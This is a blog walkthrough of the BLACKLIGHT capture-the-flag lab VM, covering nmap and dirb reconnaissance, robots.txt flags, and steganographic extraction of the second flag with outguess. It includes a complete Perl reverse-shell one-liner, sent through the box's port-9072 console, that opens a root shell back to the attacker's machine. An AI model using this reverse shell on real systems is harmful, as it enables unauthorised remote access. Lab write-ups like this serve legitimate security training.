Lets first start off with an nmap scan of the remote host.
root@ubuntu:~# nmap -sS -sV -sC -Pn -O -T5 -p- 192.168.0.40 Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-15 13:39 MDT Nmap scan report for 192.168.0.40 Host is up (0.00049s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: BLACKLIGHT 9072/tcp open unknown | fingerprint-strings: | DNSStatusRequest, DNSVersionBindReq, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe: |_ BLACKLIGHT console mk1. Type .help for instructions 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port9072-TCP:V=7.60%I=7%D=10/15%Time=5DA62126%P=x86_64-pc-linux-gnu%r(N SF:ULL,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20inst SF:ructions\n")%r(GenericLines,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\ SF:x20\.help\x20for\x20instructions\n")%r(GetRequest,34,"BLACKLIGHT\x20con SF:sole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(HTTPOption SF:s,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instru SF:ctions\n")%r(RTSPRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20 SF:\.help\x20for\x20instructions\n")%r(RPCCheck,34,"BLACKLIGHT\x20console\ SF:x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(DNSVersionBindR SF:eq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instr SF:uctions\n")%r(DNSStatusRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Ty SF:pe\x20\.help\x20for\x20instructions\n")%r(Help,34,"BLACKLIGHT\x20consol SF:e\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SSLSessionReq SF:,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruc SF:tions\n")%r(TLSSessionReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x2 SF:0\.help\x20for\x20instructions\n")%r(Kerberos,34,"BLACKLIGHT\x20console SF:\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SMBProgNeg,34, SF:"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruction SF:s\n")%r(X11Probe,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x SF:20for\x20instructions\n")%r(FourOhFourRequest,34,"BLACKLIGHT\x20console SF:\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(LPDString,34," SF:BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions SF:\n")%r(LDAPSearchReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.he SF:lp\x20for\x20instructions\n")%r(LDAPBindReq,34,"BLACKLIGHT\x20console\x SF:20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SIPOptions,34,"B SF:LACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\ SF:n")%r(LANDesk-RC,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x SF:20for\x20instructions\n")%r(TerminalServer,34,"BLACKLIGHT\x20console\x2 SF:0mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(NCP,34,"BLACKLIGH SF:T\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n"); MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.8 Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 334.99 seconds root@ubuntu:~#
NMAP found two open ports 80 and 9072. lets fire up dirb and start looking for some interesting directories we can browse.
---- Scanning URL: http://192.168.0.40/ ----
==> DIRECTORY: http://192.168.0.40/css/
==> DIRECTORY: http://192.168.0.40/fonts/
==> DIRECTORY: http://192.168.0.40/footer/
==> DIRECTORY: http://192.168.0.40/img/
+ http://192.168.0.40/index.html (CODE:200|SIZE:1759)
==> DIRECTORY: http://192.168.0.40/javascript/
==> DIRECTORY: http://192.168.0.40/js/
+ http://192.168.0.40/robots.txt (CODE:200|SIZE:40)
+ http://192.168.0.40/server-status (CODE:403|SIZE:300)
---- Entering directory: http://192.168.0.40/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.40/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.40/footer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.40/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.40/javascript/ ----
==> DIRECTORY: http://192.168.0.40/javascript/jquery/
---- Entering directory: http://192.168.0.40/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.40/javascript/jquery/ ----
+ http://192.168.0.40/javascript/jquery/jquery (CODE:200|SIZE:268026)
Dirb came back with some interesting results which lead to nothing really. Our next step is to see if a robots.txt file exists.
User-agent: * flag1.txt blacklight.dic
We got the robots.txt file with two entries in it one of them being a flag. The other file seems to be a dictonrary file we will save for later use.
{flag1:fc4c7223964a26b152823d14f129687207e7fe15}
9072. The secret is at home.
Lets move on to the port 9072. This port seem to be some sort of remote command shell allowing you to run commands. There is one caveat thought, you are limited to only using two commands then the server locks itself from being used. We first try the readhash command to retereive a hash.
b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6
The other command avaiable to us are exec and quit. Lets try to exec a reverse connect shell.
BLACKLIGHT console mk1. Type .help for instructions .help .readhash - Get one step closer .exec- Execute commands .quit - Exit the server .exec perl -e 'use Socket;$i="192.168.0.42";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
We got a successful connect back as root! now lets move on to finding the other flags. We cd to the /home directory where the clue led us to eariler to find the secret.
root@blacklight:/home# cd blacklight root@blacklight:/home/blacklight# ls -la total 48 drwxr-xr-x 6 blacklight blacklight 4096 Jun 7 2018 . drwxr-xr-x 3 root root 4096 Jun 7 2018 .. -rw------- 1 blacklight blacklight 1019 Jun 8 2018 .bash_history -rw-r--r-- 1 blacklight blacklight 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 blacklight blacklight 3771 Apr 4 2018 .bashrc drwx------ 2 blacklight blacklight 4096 Jun 7 2018 .cache -rwxrwxr-x 1 blacklight blacklight 1019 Jun 7 2018 console.rb drwx------ 3 blacklight blacklight 4096 Jun 7 2018 .gnupg -rw-r--r-- 1 root root 65 Jun 7 2018 hash.txt drwxrwxr-x 3 blacklight blacklight 4096 Jun 7 2018 .local -rw-r--r-- 1 blacklight blacklight 666 Jun 7 2018 .profile drwxr-xr-x 2 root root 4096 Jun 7 2018 .secret -rw-r--r-- 1 blacklight blacklight 0 Jun 7 2018 .sudo_as_admin_successful root@blacklight:/home/blacklight#
We download the flag2.jpg and use the steg program 'outguess' to read the flag contained in the image.
sam@ubuntu:~$ outguess -r flag2-inside.jpg flag2.txt
Reading flag2-inside.jpg....
Extracting usable bits: 18496 bits
Steg retrieve: seed: 180, len: 133
sam@ubuntu:~$ cat flag2.txt
{flag2:88ea7554cbc7e89526943e9ad5d3ce2ed5ec3db4}
Francis Bacon says:
BAAAAAABAAAAAAAAAABB AABAABAABAAAABA AAAABAAAAAAAABAABBABABBAA
sam@ubuntu:~$
No comments:
Post a Comment